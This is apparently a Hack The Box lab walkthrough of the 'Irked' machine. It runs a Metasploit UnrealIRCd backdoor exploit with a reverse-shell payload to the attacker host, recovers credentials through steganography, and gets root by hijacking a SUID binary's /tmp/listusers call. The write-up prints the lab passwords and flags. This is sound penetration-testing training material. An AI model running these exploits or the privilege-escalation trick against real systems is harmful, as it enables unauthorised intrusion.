About

Irked is a pretty simple and straightforward box that requires only basic enumeration skills. It shows the need to scan all ports on a machine and to investigate any out-of-place binaries found while enumerating a system.

Enumeration

Running the script portscan.sh reveals 4 attack vectors: SSH, HTTP, RPC and IRC.

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ sudo portscan.sh 10.129.41.31

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ cat PortScan\(10.129.41.31\)

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34709/tcp   status
|   100024  1          38216/udp   status
|   100024  1          44632/udp6  status
|_  100024  1          47393/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
34709/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd (Admin email djmardov@irked.htb)
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

IRC

Using searchsploit-prettify.py, I’m able to find 4 public vulnerabilities for UnrealIRCd.

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ searchsploit-prettify.py UnrealIRCd
 -------------------------------------------------------------- -----------------------------------------------------
| Exploit Title                                                | Path                                                |
 -------------------------------------------------------------- -----------------------------------------------------
| UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | /usr/share/exploitdb/exploits/linux/remote/16922.rb |
| UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow      | /usr/share/exploitdb/exploits/windows/dos/18011.txt |
| UnrealIRCd 3.2.8.1 - Remote Downloader/Execute               | /usr/share/exploitdb/exploits/linux/remote/13853.pl |
| UnrealIRCd 3.x - Remote Denial of Service                    | /usr/share/exploitdb/exploits/windows/dos/27407.pl  |
 -------------------------------------------------------------- -----------------------------------------------------

Using the Metasploit module found, I’m able to gain a shell as the user ircd.

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ msfconsole -q -x 'use exploit/unix/irc/unreal_ircd_3281_backdoor; set RHOSTS 10.129.41.31; set RPORT 6697; set PAYLOAD payload/cmd/unix/reverse; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
RHOSTS => 10.129.41.31
RPORT => 6697
PAYLOAD => cmd/unix/reverse
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP double handler on 10.10.16.9:4444
[*] 10.129.41.31:6697 - Connected to 10.129.41.31:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.129.41.31:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo QAsX11I49Qk0Ifo1;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "QAsX11I49Qk0Ifo1\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.16.9:4444 -> 10.129.41.31:40025) at 2023-11-01 22:18:33 -0400

id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Lateral Movement

After some enumeration, I’m able to find a file .backup in djmardov's Documents directory, which reveals the steganography passphrase UPupDOWNdownLRlrBAbaSSss.

cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

As the file mentions steganography, I’ll start by checking the image shown on the index page of the HTTP service.

After downloading the image and extracting the hidden data with steghide using the passphrase UPupDOWNdownLRlrBAbaSSss, I’m able to recover pass.txt, which contains the password Kab6h+m+bbp2J:HG.

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ wget -q http://10.129.41.31/irked.jpg

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ cat pass.txt
Kab6h+m+bbp2J:HG

With the credential djmardov:Kab6h+m+bbp2J:HG, I’m able to gain a shell as the user djmardov.

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ sshpass -p 'Kab6h+m+bbp2J:HG' ssh djmardov@10.129.41.31

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

Privilege Escalation

Checking for files with the SUID bit set, I’m able to find an interesting binary, /usr/bin/viewuser.

djmardov@irked:~$ find / -user root -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

Based on its output, viewuser appears to execute who, which succeeds, and then /tmp/listusers, which fails because the file does not exist.

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2023-11-07 21:05 (:0)
djmardov pts/0        2023-11-07 21:08 (10.10.16.9)
sh: 1: /tmp/listusers: not found

To analyze the binary further, I’ll copy it off the box using scp.

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ sshpass -p 'Kab6h+m+bbp2J:HG' scp djmardov@10.129.41.31:/usr/bin/viewuser viewuser

I’ll then disassemble main in the binary viewuser using gdb (with the PEDA extension, as the prompt shows).

┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ gdb viewuser
GNU gdb (Debian 13.2-1) 13.2
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from viewuser...
(No debugging symbols found in viewuser)
gdb-peda$ disas main
Dump of assembler code for function main:
   0x0000057d <+0>:	lea    ecx,[esp+0x4]
   0x00000581 <+4>:	and    esp,0xfffffff0
   0x00000584 <+7>:	push   DWORD PTR [ecx-0x4]
   0x00000587 <+10>:	push   ebp
   0x00000588 <+11>:	mov    ebp,esp
   0x0000058a <+13>:	push   ebx
   0x0000058b <+14>:	push   ecx
   0x0000058c <+15>:	call   0x480 <__x86.get_pc_thunk.bx>
   0x00000591 <+20>:	add    ebx,0x1a6f
   0x00000597 <+26>:	sub    esp,0xc
   0x0000059a <+29>:	lea    eax,[ebx-0x1980]
   0x000005a0 <+35>:	push   eax
   0x000005a1 <+36>:	call   0x3f0 <puts@plt>
   0x000005a6 <+41>:	add    esp,0x10
   0x000005a9 <+44>:	sub    esp,0xc
   0x000005ac <+47>:	lea    eax,[ebx-0x1938]
   0x000005b2 <+53>:	push   eax
   0x000005b3 <+54>:	call   0x3f0 <puts@plt>
   0x000005b8 <+59>:	add    esp,0x10
   0x000005bb <+62>:	sub    esp,0xc
   0x000005be <+65>:	lea    eax,[ebx-0x1913]
   0x000005c4 <+71>:	push   eax
   0x000005c5 <+72>:	call   0x400 <system@plt>
   0x000005ca <+77>:	add    esp,0x10
   0x000005cd <+80>:	sub    esp,0xc
   0x000005d0 <+83>:	push   0x0
   0x000005d2 <+85>:	call   0x420 <setuid@plt>
   0x000005d7 <+90>:	add    esp,0x10
   0x000005da <+93>:	sub    esp,0xc
   0x000005dd <+96>:	lea    eax,[ebx-0x190f]
   0x000005e3 <+102>:	push   eax
   0x000005e4 <+103>:	call   0x400 <system@plt>
   0x000005e9 <+108>:	add    esp,0x10
   0x000005ec <+111>:	mov    eax,0x0
   0x000005f1 <+116>:	lea    esp,[ebp-0x8]
   0x000005f4 <+119>:	pop    ecx
   0x000005f5 <+120>:	pop    ebx
   0x000005f6 <+121>:	pop    ebp
   0x000005f7 <+122>:	lea    esp,[ecx-0x4]
   0x000005fa <+125>:	ret
End of assembler dump.

gdb-peda$ x/s main+20+0x1a6f-0x1980
0x680:	"This application is being devleoped to set and test user permissions"

gdb-peda$ x/s main+20+0x1a6f-0x1938
0x6c8:	"It is still being actively developed"

gdb-peda$ x/s main+20+0x1a6f-0x1913
0x6ed:	"who"

gdb-peda$ x/s main+20+0x1a6f-0x190f
0x6f1:	"/tmp/listusers"

Reverse engineering the binary reveals a simple program that calls setuid(0), which succeeds because the binary is SUID root, and then executes /tmp/listusers as root. The equivalent C source:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    puts("This application is being devleoped to set and test user permissions");
    puts("It is still being actively developed");
    system("who");              /* runs /bin/sh -c "who"; resolved via the caller's PATH */

    setuid(0);                  /* succeeds because the binary is SUID root */
    system("/tmp/listusers");   /* world-writable location, executed as root */

    return 0;
}

By copying the binary /bin/bash as /tmp/listusers and running viewuser, I’m able to gain a shell as the user root.

djmardov@irked:~$ cp /bin/bash /tmp/listusers

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2023-11-07 21:05 (:0)
djmardov pts/0        2023-11-07 21:08 (10.10.16.9)

root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

root@irked:~# cat /home/djmardov/user.txt
e6f46281d480a2b6d5512f30f80b53c5

root@irked:~# cat /root/root.txt
6668e6efd551778c4460f76cee9dbda0